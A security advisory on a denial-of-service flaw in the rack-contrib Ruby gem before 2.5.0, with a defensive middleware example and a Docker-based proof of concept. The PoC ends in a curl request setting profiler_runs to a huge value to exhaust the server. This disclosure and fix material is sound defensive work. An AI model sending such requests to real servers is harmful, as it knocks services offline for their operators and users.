Allocation of Resources Without Limits or Throttling Affecting rack-contrib package, versions <2.5.0


Severity

high (CVSS assessment made by Snyk's Security Team)

Threat Intelligence
  • Exploit Maturity: Proof of concept
  • EPSS: 0.04% (10th percentile)

  • Snyk ID SNYK-RUBY-RACKCONTRIB-7148535
  • published 28 May 2024
  • disclosed 27 May 2024
  • credit Sim4n6

How to fix?

Upgrade rack-contrib to version 2.5.0 or higher.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the unconstrained value of the incoming profiler_runs parameter. An attacker can cause the server to allocate excessive resources, leading to a denial of service by sending crafted requests with large profiler_runs values.
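The root cause is that the request can choose how many times the profiler runs, so the cheapest mitigation is to never let an unbounded value reach Rack::Profiler. The following is an added example, not code from the advisory or from the rack-contrib project: a small Rack middleware that sits in front of Rack::Profiler and clamps or rejects the profiler_runs query parameter. The class name ProfilerRunsGuard, the MAX_RUNS limit of 10, and the choice to clamp oversized values while rejecting non-numeric ones are all assumptions made for the illustration; it parses the query string with Ruby's stdlib so it runs without the rack gem installed.

```ruby
require 'uri'

# Added example (not part of the advisory or rack-contrib): a middleware that
# bounds the `profiler_runs` query parameter before Rack::Profiler sees it.
# MAX_RUNS is an assumed, illustrative ceiling; tune it to your needs.
class ProfilerRunsGuard
  MAX_RUNS = 10
  PARAM = 'profiler_runs'

  def initialize(app, max_runs: MAX_RUNS)
    @app = app
    @max_runs = max_runs
  end

  # Returns [sanitized_query_string, status], where status is :unchanged,
  # :clamped (value was above max_runs and lowered to it) or :rejected
  # (value was not a plain non-negative integer, e.g. "1e9", "-5" or "").
  def self.sanitize(query_string, max_runs = MAX_RUNS)
    pairs = URI.decode_www_form(query_string.to_s)
    status = :unchanged
    pairs = pairs.map do |key, value|
      next [key, value] unless key == PARAM
      return [query_string, :rejected] unless value =~ /\A\d+\z/
      runs = value.to_i
      if runs > max_runs
        status = :clamped
        [key, max_runs.to_s]
      else
        [key, value]
      end
    end
    [URI.encode_www_form(pairs), status]
  end

  # Rack entry point: rewrite QUERY_STRING when clamped, answer 400 when
  # rejected, otherwise pass the request down the stack untouched.
  def call(env)
    query, status = self.class.sanitize(env['QUERY_STRING'], @max_runs)
    if status == :rejected
      return [400, { 'content-type' => 'text/plain' }, ["invalid #{PARAM}\n"]]
    end
    env['QUERY_STRING'] = query if status == :clamped
    @app.call(env)
  end
end

# In a config.ru this would be wired ahead of the profiler, e.g.:
#   use ProfilerRunsGuard, max_runs: 10
#   use Rack::Profiler
```

Clamping rather than rejecting keeps legitimate profiling requests working while removing the attacker's ability to pick the iteration count; the 400 for malformed values makes the rejection visible in access logs, which is a useful signal for detecting probing of this parameter.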

PoC

config.ru file:

require 'rack'
require 'rack/contrib'

use Rack::Profiler # if ENV['RACK_ENV'] == 'development'

# Define a Rack application
app = lambda do |env|
  # Your application logic goes here
  [200, {}, ["Hello World"]]
end

# Run the Rack application
run app

A Dockerfile:

# Use the official Ruby image as a base
FROM ruby:latest

# Set the working directory inside the container
WORKDIR /app

# Copy the custom config.ru file into the container
COPY config.ru .
COPY Gemfile .

# Install rack and the gems needed to run the app
RUN bundle install

# Expose the port that rackup will listen on
EXPOSE 9292

# Run rackup when the container starts
ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"]

# Health check
HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1

A Gemfile:

source 'https://rubygems.org'

gem 'rack', '> 2.0'
gem 'rack-contrib', '> 2.4'
gem 'rackup'
gem 'ruby-prof'

A Docker compose:

services:
  app:
    build:
      context: .
    ports:
      - "9292:9292"

To run the PoC:

docker compose up --build

To exploit DoS:

curl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"

CVSS Scores

version 3.1

Snyk: 8.6 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Changed
  • Confidentiality (C)
    None
  • Integrity (I)
    None
  • Availability (A)
    High